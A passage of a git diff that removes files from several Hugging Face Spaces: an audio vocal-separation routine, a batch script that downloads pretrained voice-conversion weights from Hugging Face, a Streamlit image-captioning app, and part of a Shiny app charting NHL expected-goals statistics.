").strip('"').strip("\n").strip('"').strip(" ") - ) - save_root_ins = ( - save_root_ins.strip(" ").strip('"').strip("\n").strip('"').strip(" ") - ) - if model_name == "onnx_dereverb_By_FoxJoy": - pre_fun = MDXNetDereverb(15, config.device) - else: - func = AudioPre if "DeEcho" not in model_name else AudioPreDeEcho - pre_fun = func( - agg=int(agg), - model_path=os.path.join( - os.getenv("weight_uvr5_root"), model_name + ".pth" - ), - device=config.device, - is_half=config.is_half, - ) - if inp_root != "": - paths = [os.path.join(inp_root, name) for name in os.listdir(inp_root)] - else: - paths = [path.name for path in paths] - for path in paths: - inp_path = os.path.join(inp_root, path) - need_reformat = 1 - done = 0 - try: - info = ffmpeg.probe(inp_path, cmd="ffprobe") - if ( - info["streams"][0]["channels"] == 2 - and info["streams"][0]["sample_rate"] == "44100" - ): - need_reformat = 0 - pre_fun._path_audio_( - inp_path, save_root_ins, save_root_vocal, format0 - ) - done = 1 - except: - need_reformat = 1 - traceback.print_exc() - if need_reformat == 1: - tmp_path = "%s/%s.reformatted.wav" % ( - os.path.join(os.environ["TEMP"]), - os.path.basename(inp_path), - ) - os.system( - "ffmpeg -i %s -vn -acodec pcm_s16le -ac 2 -ar 44100 %s -y" - % (inp_path, tmp_path) - ) - inp_path = tmp_path - try: - if done == 0: - pre_fun.path_audio( - inp_path, save_root_ins, save_root_vocal, format0 - ) - infos.append("%s->Success" % (os.path.basename(inp_path))) - yield "\n".join(infos) - except: - try: - if done == 0: - pre_fun._path_audio_( - inp_path, save_root_ins, save_root_vocal, format0 - ) - infos.append("%s->Success" % (os.path.basename(inp_path))) - yield "\n".join(infos) - except: - infos.append( - "%s->%s" % (os.path.basename(inp_path), traceback.format_exc()) - ) - yield "\n".join(infos) - except: - infos.append(traceback.format_exc()) - yield "\n".join(infos) - finally: - try: - if model_name == "onnx_dereverb_By_FoxJoy": - del pre_fun.pred.model - del pre_fun.pred.model_ - else: - del pre_fun.model - del pre_fun - except: - traceback.print_exc() - if torch.cuda.is_available(): - torch.cuda.empty_cache() - logger.info("Executed torch.cuda.empty_cache()") - yield "\n".join(infos) diff --git a/spaces/ServerX/PorcoDiaz/tools/dlmodels.bat 
b/spaces/ServerX/PorcoDiaz/tools/dlmodels.bat deleted file mode 100644 index 5d80f50369b1f3ed37c045d07a9e2ce8954f09d4..0000000000000000000000000000000000000000 --- a/spaces/ServerX/PorcoDiaz/tools/dlmodels.bat +++ /dev/null @@ -1,348 +0,0 @@ -@echo off && chcp 65001 - -echo working dir is %cd% -echo downloading requirement aria2 check. -echo= -dir /a:d/b | findstr "aria2" > flag.txt -findstr "aria2" flag.txt >nul -if %errorlevel% ==0 ( - echo aria2 checked. - echo= -) else ( - echo failed. please downloading aria2 from webpage! - echo unzip it and put in this directory! - timeout /T 5 - start https://github.com/aria2/aria2/releases/tag/release-1.36.0 - echo= - goto end -) - -echo envfiles checking start. -echo= - -for /f %%x in ('findstr /i /c:"aria2" "flag.txt"') do (set aria2=%%x)&goto endSch -:endSch - -set d32=f0D32k.pth -set d40=f0D40k.pth -set d48=f0D48k.pth -set g32=f0G32k.pth -set g40=f0G40k.pth -set g48=f0G48k.pth - -set d40v2=f0D40k.pth -set g40v2=f0G40k.pth - -set dld32=https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/pretrained/f0D32k.pth -set dld40=https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/pretrained/f0D40k.pth -set dld48=https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/pretrained/f0D48k.pth -set dlg32=https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/pretrained/f0G32k.pth -set dlg40=https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/pretrained/f0G40k.pth -set dlg48=https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/pretrained/f0G48k.pth - -set dld40v2=https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/pretrained_v2/f0D40k.pth -set dlg40v2=https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/pretrained_v2/f0G40k.pth - -set hp2_all=HP2_all_vocals.pth -set hp3_all=HP3_all_vocals.pth -set hp5_only=HP5_only_main_vocal.pth -set VR_DeEchoAggressive=VR-DeEchoAggressive.pth -set VR_DeEchoDeReverb=VR-DeEchoDeReverb.pth -set VR_DeEchoNormal=VR-DeEchoNormal.pth -set onnx_dereverb=vocals.onnx - -set dlhp2_all=https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/uvr5_weights/HP2_all_vocals.pth -set dlhp3_all=https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/uvr5_weights/HP3_all_vocals.pth -set dlhp5_only=https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/uvr5_weights/HP5_only_main_vocal.pth -set dlVR_DeEchoAggressive=https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/uvr5_weights/VR-DeEchoAggressive.pth -set dlVR_DeEchoDeReverb=https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/uvr5_weights/VR-DeEchoDeReverb.pth -set dlVR_DeEchoNormal=https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/uvr5_weights/VR-DeEchoNormal.pth -set dlonnx_dereverb=https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/uvr5_weights/onnx_dereverb_By_FoxJoy/vocals.onnx - -set hb=hubert_base.pt - -set dlhb=https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/hubert_base.pt - -echo dir check start. -echo= - -if exist "%~dp0assets\pretrained" ( - echo dir .\assets\pretrained checked. - ) else ( - echo failed. generating dir .\assets\pretrained. - mkdir pretrained - ) -if exist "%~dp0assets\pretrained_v2" ( - echo dir .\assets\pretrained_v2 checked. - ) else ( - echo failed. generating dir .\assets\pretrained_v2. - mkdir pretrained_v2 - ) -if exist "%~dp0assets\uvr5_weights" ( - echo dir .\assets\uvr5_weights checked. - ) else ( - echo failed. generating dir .\assets\uvr5_weights. 
- mkdir uvr5_weights - ) -if exist "%~dp0assets\uvr5_weights\onnx_dereverb_By_FoxJoy" ( - echo dir .\assets\uvr5_weights\onnx_dereverb_By_FoxJoy checked. - ) else ( - echo failed. generating dir .\assets\uvr5_weights\onnx_dereverb_By_FoxJoy. - mkdir uvr5_weights\onnx_dereverb_By_FoxJoy - ) - -echo= -echo dir check finished. - -echo= -echo required files check start. - -echo checking D32k.pth -if exist "%~dp0assets\pretrained\D32k.pth" ( - echo D32k.pth in .\assets\pretrained checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/pretrained/D32k.pth -d %~dp0assets\pretrained -o D32k.pth - if exist "%~dp0assets\pretrained\D32k.pth" (echo download successful.) else (echo please try again! - echo=) - ) -echo checking D40k.pth -if exist "%~dp0assets\pretrained\D40k.pth" ( - echo D40k.pth in .\assets\pretrained checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/pretrained/D40k.pth -d %~dp0assets\pretrained -o D40k.pth - if exist "%~dp0assets\pretrained\D40k.pth" (echo download successful.) else (echo please try again! - echo=) - ) -echo checking D40k.pth -if exist "%~dp0assets\pretrained_v2\D40k.pth" ( - echo D40k.pth in .\assets\pretrained_v2 checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/pretrained_v2/D40k.pth -d %~dp0assets\pretrained_v2 -o D40k.pth - if exist "%~dp0assets\pretrained_v2\D40k.pth" (echo download successful.) else (echo please try again! - echo=) - ) -echo checking D48k.pth -if exist "%~dp0assets\pretrained\D48k.pth" ( - echo D48k.pth in .\assets\pretrained checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/pretrained/D48k.pth -d %~dp0assets\pretrained -o D48k.pth - if exist "%~dp0assets\pretrained\D48k.pth" (echo download successful.) else (echo please try again! - echo=) - ) -echo checking G32k.pth -if exist "%~dp0assets\pretrained\G32k.pth" ( - echo G32k.pth in .\assets\pretrained checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/pretrained/G32k.pth -d %~dp0assets\pretrained -o G32k.pth - if exist "%~dp0assets\pretrained\G32k.pth" (echo download successful.) else (echo please try again! - echo=) - ) -echo checking G40k.pth -if exist "%~dp0assets\pretrained\G40k.pth" ( - echo G40k.pth in .\assets\pretrained checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/pretrained/G40k.pth -d %~dp0assets\pretrained -o G40k.pth - if exist "%~dp0assets\pretrained\G40k.pth" (echo download successful.) else (echo please try again! - echo=) - ) -echo checking G40k.pth -if exist "%~dp0assets\pretrained_v2\G40k.pth" ( - echo G40k.pth in .\assets\pretrained_v2 checked. - echo= - ) else ( - echo failed. starting download from huggingface. 
- %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/pretrained_v2/G40k.pth -d %~dp0assets\pretrained_v2 -o G40k.pth - if exist "%~dp0assets\pretrained_v2\G40k.pth" (echo download successful.) else (echo please try again! - echo=) - ) -echo checking G48k.pth -if exist "%~dp0assets\pretrained\G48k.pth" ( - echo G48k.pth in .\assets\pretrained checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/pretrained/G48k.pth -d %~dp0assets\pretrained -o G48k.pth - if exist "%~dp0assets\pretrained\G48k.pth" (echo download successful.) else (echo please try again! - echo=) - ) - -echo checking %d32% -if exist "%~dp0assets\pretrained\%d32%" ( - echo %d32% in .\assets\pretrained checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M %dld32% -d %~dp0assets\pretrained -o %d32% - if exist "%~dp0assets\pretrained\%d32%" (echo download successful.) else (echo please try again! - echo=) - ) -echo checking %d40% -if exist "%~dp0assets\pretrained\%d40%" ( - echo %d40% in .\assets\pretrained checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M %dld40% -d %~dp0assets\pretrained -o %d40% - if exist "%~dp0assets\pretrained\%d40%" (echo download successful.) else (echo please try again! - echo=) - ) -echo checking %d40v2% -if exist "%~dp0assets\pretrained_v2\%d40v2%" ( - echo %d40v2% in .\assets\pretrained_v2 checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M %dld40v2% -d %~dp0assets\pretrained_v2 -o %d40v2% - if exist "%~dp0assets\pretrained_v2\%d40v2%" (echo download successful.) else (echo please try again! - echo=) - ) -echo checking %d48% -if exist "%~dp0assets\pretrained\%d48%" ( - echo %d48% in .\assets\pretrained checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M %dld48% -d %~dp0assets\pretrained -o %d48% - if exist "%~dp0assets\pretrained\%d48%" (echo download successful.) else (echo please try again! - echo=) - ) -echo checking %g32% -if exist "%~dp0assets\pretrained\%g32%" ( - echo %g32% in .\assets\pretrained checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M %dlg32% -d %~dp0assets\pretrained -o %g32% - if exist "%~dp0assets\pretrained\%g32%" (echo download successful.) else (echo please try again! - echo=) - ) -echo checking %g40% -if exist "%~dp0assets\pretrained\%g40%" ( - echo %g40% in .\assets\pretrained checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M %dlg40% -d %~dp0assets\pretrained -o %g40% - if exist "%~dp0assets\pretrained\%g40%" (echo download successful.) else (echo please try again! - echo=) - ) -echo checking %g40v2% -if exist "%~dp0assets\pretrained_v2\%g40v2%" ( - echo %g40v2% in .\assets\pretrained_v2 checked. - echo= - ) else ( - echo failed. starting download from huggingface. 
- %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M %dlg40v2% -d %~dp0assets\pretrained_v2 -o %g40v2% - if exist "%~dp0assets\pretrained_v2\%g40v2%" (echo download successful.) else (echo please try again! - echo=) - ) -echo checking %g48% -if exist "%~dp0assets\pretrained\%g48%" ( - echo %g48% in .\assets\pretrained checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M %dlg48% -d %~dp0assets\pretrained -o %g48% - if exist "%~dp0assets\pretrained\%g48%" (echo download successful.) else (echo please try again! - echo=) - ) - -echo checking %hp2_all% -if exist "%~dp0assets\uvr5_weights\%hp2_all%" ( - echo %hp2_all% in .\assets\uvr5_weights checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M %dlhp2_all% -d %~dp0assets\uvr5_weights -o %hp2_all% - if exist "%~dp0assets\uvr5_weights\%hp2_all%" (echo download successful.) else (echo please try again! - echo=) - ) -echo checking %hp3_all% -if exist "%~dp0assets\uvr5_weights\%hp3_all%" ( - echo %hp3_all% in .\assets\uvr5_weights checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M %dlhp3_all% -d %~dp0assets\uvr5_weights -o %hp3_all% - if exist "%~dp0assets\uvr5_weights\%hp3_all%" (echo download successful.) else (echo please try again! - echo=) - ) -echo checking %hp5_only% -if exist "%~dp0assets\uvr5_weights\%hp5_only%" ( - echo %hp5_only% in .\assets\uvr5_weights checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M %dlhp5_only% -d %~dp0assets\uvr5_weights -o %hp5_only% - if exist "%~dp0assets\uvr5_weights\%hp5_only%" (echo download successful.) else (echo please try again! - echo=) - ) -echo checking %VR_DeEchoAggressive% -if exist "%~dp0assets\uvr5_weights\%VR_DeEchoAggressive%" ( - echo %VR_DeEchoAggressive% in .\assets\uvr5_weights checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M %dlVR_DeEchoAggressive% -d %~dp0assets\uvr5_weights -o %VR_DeEchoAggressive% - if exist "%~dp0assets\uvr5_weights\%VR_DeEchoAggressive%" (echo download successful.) else (echo please try again! - echo=) - ) -echo checking %VR_DeEchoDeReverb% -if exist "%~dp0assets\uvr5_weights\%VR_DeEchoDeReverb%" ( - echo %VR_DeEchoDeReverb% in .\assets\uvr5_weights checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M %dlVR_DeEchoDeReverb% -d %~dp0assets\uvr5_weights -o %VR_DeEchoDeReverb% - if exist "%~dp0assets\uvr5_weights\%VR_DeEchoDeReverb%" (echo download successful.) else (echo please try again! - echo=) - ) -echo checking %VR_DeEchoNormal% -if exist "%~dp0assets\uvr5_weights\%VR_DeEchoNormal%" ( - echo %VR_DeEchoNormal% in .\assets\uvr5_weights checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M %dlVR_DeEchoNormal% -d %~dp0assets\uvr5_weights -o %VR_DeEchoNormal% - if exist "%~dp0assets\uvr5_weights\%VR_DeEchoNormal%" (echo download successful.) else (echo please try again! 
- echo=) - ) -echo checking %onnx_dereverb% -if exist "%~dp0assets\uvr5_weights\onnx_dereverb_By_FoxJoy\%onnx_dereverb%" ( - echo %onnx_dereverb% in .\assets\uvr5_weights\onnx_dereverb_By_FoxJoy checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M %dlonnx_dereverb% -d %~dp0assets\uvr5_weights\onnx_dereverb_By_FoxJoy -o %onnx_dereverb% - if exist "%~dp0assets\uvr5_weights\onnx_dereverb_By_FoxJoy\%onnx_dereverb%" (echo download successful.) else (echo please try again! - echo=) - ) - -echo checking %hb% -if exist "%~dp0assets\hubert\%hb%" ( - echo %hb% in .\assets\hubert\pretrained checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M %dlhb% -d %~dp0assets\hubert\ -o %hb% - if exist "%~dp0assets\hubert\%hb%" (echo download successful.) else (echo please try again! - echo=) - ) - -echo required files check finished. -echo envfiles check complete. -pause -:end -del flag.txt diff --git a/spaces/Soumen/image_to_text/app.py b/spaces/Soumen/image_to_text/app.py deleted file mode 100644 index 264d9713117154bb6fe0cad184929419b98c2952..0000000000000000000000000000000000000000 --- a/spaces/Soumen/image_to_text/app.py +++ /dev/null @@ -1,56 +0,0 @@ -import streamlit as st -import torch -from PIL import Image -from transformers import VisionEncoderDecoderModel, ViTFeatureExtractor, AutoTokenizer -#pickle.load(open('energy_model.pkl', 'rb')) -#vocab = np.load('w2i.p', allow_pickle=True) -st.title("Image_Captioning_App") -@st.experimental_singleton -def load_models(): - model = VisionEncoderDecoderModel.from_pretrained("nlpconnect/vit-gpt2-image-captioning") - feature_extractor = ViTFeatureExtractor.from_pretrained("nlpconnect/vit-gpt2-image-captioning") - tokenizer = AutoTokenizer.from_pretrained("nlpconnect/vit-gpt2-image-captioning") - return model, feature_extractor, tokenizer -#st.text("Build with Streamlit and OpenCV") -if "photo" not in st.session_state: - st.session_state["photo"]="not done" -c2, c3 = st.columns([2,1]) -def change_photo_state(): - st.session_state["photo"]="done" -@st.cache -def load_image(img): - im = Image.open(img) - return im -uploaded_photo = c3.file_uploader("Upload Image",type=['jpg','png','jpeg'], on_change=change_photo_state) -camera_photo = c2.camera_input("Take a photo", on_change=change_photo_state) - -#st.subheader("Detection") -if st.checkbox("Generate_Caption"): - model, feature_extractor, tokenizer = load_models() - device = torch.device("cuda" if torch.cuda.is_available() else "cpu") - model.to(device) - max_length = 16 - num_beams = 4 - gen_kwargs = {"max_length": max_length, "num_beams": num_beams} - def predict_step(our_image): - if our_image.mode != "RGB": - our_image = our_image.convert(mode="RGB") - pixel_values = feature_extractor(images=our_image, return_tensors="pt").pixel_values - pixel_values = pixel_values.to(device) - output_ids = model.generate(pixel_values, **gen_kwargs) - preds = tokenizer.batch_decode(output_ids, skip_special_tokens=True) - preds = [pred.strip() for pred in preds] - return preds - if st.session_state["photo"]=="done": - if uploaded_photo: - our_image= load_image(uploaded_photo) - elif camera_photo: - our_image= load_image(camera_photo) - elif uploaded_photo==None and camera_photo==None: - pass - #our_image= load_image('image.jpg') - st.success(predict_step(our_image)) -elif st.checkbox("About"): - st.subheader("About Image Captioning App") - 
st.markdown("Built with Streamlit by [Soumen Sarker](https://soumen-sarker-personal-website.streamlit.app/)") - st.markdown("Demo applicaton of the following model [credit](https://huggingface.co/nlpconnect/vit-gpt2-image-captioning/)") \ No newline at end of file diff --git a/spaces/StatsByZach/app/game.py b/spaces/StatsByZach/app/game.py deleted file mode 100644 index ca2fa0612915dad33ea5b054d8d9274415d76d15..0000000000000000000000000000000000000000 --- a/spaces/StatsByZach/app/game.py +++ /dev/null @@ -1,741 +0,0 @@ -##### game.,py ##### - -# Import modules -from shiny import * -import shinyswatch -import plotly.express as px -from shinywidgets import output_widget, render_widget -import pandas as pd -from configure import base_url -import matplotlib.pyplot as plt -from hockey_rink import NHLRink -from matplotlib.lines import Line2D -import numpy as np -import plotly.express as px -from scipy.interpolate import interp1d -import plotly.graph_objects as go -# Paths to data -shots = "data/test_shots.csv" -info = "data/game_list.csv" -xg = "data/on_ice_xg_by_game.csv" -#data = pd.read_csv(shots) -def server(input,output,session): - game_id = session.http_conn.path_params['game_id'] - game_shots = pd.read_csv(shots) - game_info = pd.read_csv(info) - xg_df = pd.read_csv(xg) - @output - @render.text - def text(): - #t = session.__dir__() - #This is how it woks. Neat! Woooo! - t = session.http_conn.path_params['game_id'] - return t - - @output - @render.text - def game_info_teams(): - gi = game_info - gi = gi[gi['Game_Id']==int(game_id)] - away_team = gi['Away'].tolist()[0] - home_team = gi['Home'].tolist()[0] - date = gi['Date'].tolist()[0] - string = away_team + " @ " + home_team - return string - - @output - @render.text - def game_info_date(): - gi = game_info - gi = gi[gi['Game_Id']==int(game_id)] - date = gi['Date'].tolist()[0] - string = date - return string - - @output - @render.table - def table(): - df = game_shots - df = df[df['Game_Id']==int(game_id)] - df = df[df['Event']=="GOAL"][['p1_name','Event','xG']] - return df - - @reactive.Effect - def _(): - gi = game_shots - gi = gi[gi['Game_Id']==int(game_id)] - max_p = gi['Period'].max() - if max_p >3: - choices = ["All",1,2,3,"OT"] - else: - choices = ["All",1,2,3] - ui.update_select( - "period", - choices=choices - ) - - - @output - @render.plot - def a_scatter_plot(): - gi = game_shots - gi = gi[gi['Game_Id']==int(game_id)] - if input.strength() == "All": - gi = gi - strength_str = "All" - elif input.strength() =="Even": - gi = gi[(gi['Strength_Mapped']=="even")] - strength_str = "EV" - else: - gi = gi[(gi['homeSkatersOnIce']==5)&(gi['awaySkatersOnIce']==5)] - strength_str = "5v5" - if input.period()=="All": - gi=gi - title_p="" - elif input.period() == "OT": - gi = gi[gi['Period']>3] - title_p = " OT" - else: - gi = gi[gi['Period']==int(input.period())] - title_p = " Period "+str(input.period()) - away_team = gi['Away_Team'].tolist()[0] - home_team = gi['Home_Team'].tolist()[0] - home_shots = gi[(gi['Ev_Team']==home_team)] - away_shots = gi[(gi['Ev_Team']==away_team)] - date = gi["Date"].tolist()[0] - nhl_rink = NHLRink(rotation=90) - fig=plt.figure(figsize=(100,100)) - plt.xlim([0,100]) - plt.ylim([-42.5, 42.5]) - rink = NHLRink() - rink.draw() - plt.scatter((home_shots['xCordAdjusted']),(home_shots['yCordAdjusted']), (home_shots['xG']*1500) ,c= np.where((home_shots['Event']=="GOAL"),'green',np.where((home_shots['Event']=="SHOT"),'orange','red')),zorder=10,edgecolors='black',linewidth=1) - 
plt.scatter((away_shots['xCordAdjusted']*-1),(away_shots['yCordAdjusted']*-1), (away_shots['xG']*1500) ,c= np.where((away_shots['Event']=="GOAL"),'green',np.where((away_shots['Event']=="SHOT"),'orange','red')),zorder=10,edgecolors='black',linewidth=1) - fig.patch.set_facecolor('#222222') - #plt.title(away_team+" @ "+home_team+"\n"+date+"\nAll Unblocked Shot Attempts\nStrength: "+strength_str+title_p,color= 'white',size=12) - plt.title(away_team+" @ "+home_team+" - "+date+'\n'+strength_str+title_p+" Unblocked Shot Attempts",color="white") - plt.text(55,44,home_team+"\n"+str(round(home_shots['xG'].sum(),3))+" xG",color="white",horizontalalignment='center',size=12) - plt.text(-55,44,away_team+"\n"+str(round(away_shots['xG'].sum(),3))+" xG",color="white",horizontalalignment='center',size=12) - custom_points = [Line2D([0], [0], marker='o', color='w', label='shot', markerfacecolor='orange', markersize=15), - Line2D([0], [0], marker='o', color='w', label='miss', markerfacecolor='red', markersize=15), - Line2D([0], [0], marker='o', color='w', label='goal', markerfacecolor='green', markersize=15)] - - return fig - - @output - @render_widget - def my_widget(): - gi = game_info - gi = gi[gi['Game_Id']==int(game_id)] - away_team = gi['Away'].tolist()[0] - home_team = gi['Home'].tolist()[0] - date = gi['Date'].tolist()[0] - data = xg_df - data = data[data['Game_Id']==int(game_id)] - data = data[data['Team']==home_team] - if input.strength_for_bars()=="even": - xgf = "EV_xGF" - xga = "EV_xGA" - xgfp = "EV_xGF%" - toi = "EV_TOI" - title = "EV" - x_title = "Even Strength xGF%" - elif input.strength_for_bars()=="_5v5": - xgf = "5v5_xGF" - xga = "5v5_xGA" - toi = "5v5_TOI" - title = "5v5" - x_title = "5v5 xGF%" - else: - xgf = "ALL_xGF" - xga = "ALL_xGA" - toi = "ALL_TOI" - title = "All" - x_title = "All Situation xGF%" - data['xGF%'] = data[xgf]/(data[xgf]+data[xga])*100 - data = data.sort_values(by=['xGF%']) - data = data[data['xGF%']>0] - data['xGF%_str'] = data['xGF%'].round(4) - data['xGF%_str'] = data['xGF%_str'] .map('{:,.2f}%'.format) - fig = px.bar(data, x='xGF%', y='Player',text=('xGF%_str'), - color=toi,color_continuous_scale=px.colors.sequential.Oryel,template="plotly_dark",height=750,width=750, - ) - fig.update_layout(plot_bgcolor="#222222",paper_bgcolor="#222222") - fig.update_traces(marker_line_color='#FFFFFF', - marker_line_width=1.5) - fig.update_layout( - title=(home_team + " Skaters "+ title + " On-Ice xGF%
      "+away_team +" @ "+home_team+"
      "+date),margin=dict(r=20, l=40, b=100, t=90)) - fig.update_xaxes(range=[0, 100]) - fig.update_xaxes(tickvals=[0,25,50,75,100],ticktext=['0%','25%','50%','75%','100%']) - fig.add_annotation( - text = ("Data: @StatsByZach on Twitter") - , showarrow=False - , x = .70 - , y = -.06 - , xref='paper' - , yref='paper' - , xanchor='left' - , yanchor='bottom' - , xshift=-1 - , yshift=-5 - , font=dict(size=11, color="white") - , align="left" - ) - fig.update_layout(xaxis_title=x_title) - return fig - - @output - @render_widget - def my_widget2(): - gi = game_info - gi = gi[gi['Game_Id']==int(game_id)] - away_team = gi['Away'].tolist()[0] - home_team = gi['Home'].tolist()[0] - date = gi['Date'].tolist()[0] - data = xg_df - data = data[data['Game_Id']==int(game_id)] - data = data[data['Team']==away_team] - if input.strength_for_bars()=="even": - xgf = "EV_xGF" - xga = "EV_xGA" - xgfp = "EV_xGF%" - toi = "EV_TOI" - title = "EV" - x_title = "Even Strength xGF%" - elif input.strength_for_bars()=="_5v5": - xgf = "5v5_xGF" - xga = "5v5_xGA" - toi = "5v5_TOI" - title = "5v5" - x_title = "5v5 xGF%" - else: - xgf = "ALL_xGF" - xga = "ALL_xGA" - toi = "ALL_TOI" - title = "All" - x_title = "All Situation xGF%" - data['xGF%'] = data[xgf]/(data[xgf]+data[xga])*100 - data = data.sort_values(by=['xGF%']) - data = data[data['xGF%']>0] - data['xGF%_str'] = data['xGF%'].round(4) - data['xGF%_str'] = data['xGF%_str'] .map('{:,.2f}%'.format) - fig = px.bar(data, x='xGF%', y='Player',text=('xGF%_str'), - color=toi,color_continuous_scale=px.colors.sequential.Oryel,template="plotly_dark",height=750,width=750, - ) - fig.update_layout(plot_bgcolor="#222222",paper_bgcolor="#222222") - fig.update_traces(marker_line_color='#FFFFFF', - marker_line_width=1.5) - fig.update_layout( - title=(away_team + " Skaters "+ title + " On-Ice xGF%
      "+away_team +" @ "+home_team+"
      "+date),margin=dict(r=20, l=40, b=100, t=90)) - fig.update_xaxes(range=[0, 100]) - fig.update_xaxes(tickvals=[0,25,50,75,100],ticktext=['0%','25%','50%','75%','100%']) - fig.add_annotation( - text = ("Data: @StatsByZach on Twitter") - , showarrow=False - , x = .70 - , y = -.06 - , xref='paper' - , yref='paper' - , xanchor='left' - , yanchor='bottom' - , xshift=-1 - , yshift=-5 - , font=dict(size=11, color="white") - , align="left" - ) - fig.update_layout(xaxis_title=x_title) - return fig - - @output - @render_widget - def my_widget3(): - gi = game_shots - gi = gi[gi['Game_Id']==int(game_id)] - if input.strength() == "All": - gi = gi - strength_str = "All Situations" - elif input.strength() =="Even": - gi = gi[(gi['Strength_Mapped']=="even")] - strength_str = "Even Strength" - else: - gi = gi[(gi['homeSkatersOnIce']==5)&(gi['awaySkatersOnIce']==5)] - strength_str = "5v5" - if input.period()=="All": - gi=gi - title_p="" - elif input.period() == "OT": - gi = gi[gi['Period']>3] - title_p = " OT" - else: - gi = gi[gi['Period']==int(input.period())] - title_p = " Period "+str(input.period()) - away_team = gi['Away_Team'].tolist()[0] - home_team = gi['Home_Team'].tolist()[0] - date = gi["Date"].tolist()[0] - gi = gi.reset_index() - gi['xCordAdjusted'] = np.where(gi['isHomeTeam']==0,gi['xCordAdjusted']*-1,gi['xCordAdjusted']) - gi['yCordAdjusted'] = np.where(gi['isHomeTeam']==0,gi['yCordAdjusted']*-1,gi['yCordAdjusted']) - home_shots = gi[(gi['Ev_Team']==home_team)] - away_shots = gi[(gi['Ev_Team']==away_team)] - home_xg = round(home_shots['xG'].sum(),3) - away_xg = round(away_shots['xG'].sum(),3) - gi = gi.rename(columns={"p1_name":"Shooter"}) - fig = px.scatter(gi,'xCordAdjusted','yCordAdjusted',size='xG',color="Event",color_discrete_map={'MISS':"#ff7575",'GOAL':"#81ff75",'SHOT':"#ffd375"},hover_data=['Shooter','xG','Event','Period','goalieAgainst']) - fig.add_shape(type="rect", - x0=-100, y0=-45, x1=100, y1=45, - line=dict( - color="#222222", - width=2, - ), - fillcolor="#222222", - ) - fig.add_shape(type="line", - x0=100, - y0=-17, - x1=100, - y1=17,line=dict(color="#FFFFFF",width=5)) - fig.add_shape(type="line", - x0=-70, - y0=45, - x1=70, - y1=45,line=dict(color="#FFFFFF",width=5)) - - fig.add_shape(type="circle", - xref="x", yref="y", - x0=-40, y0=10, x1=-100, y1=-45, - 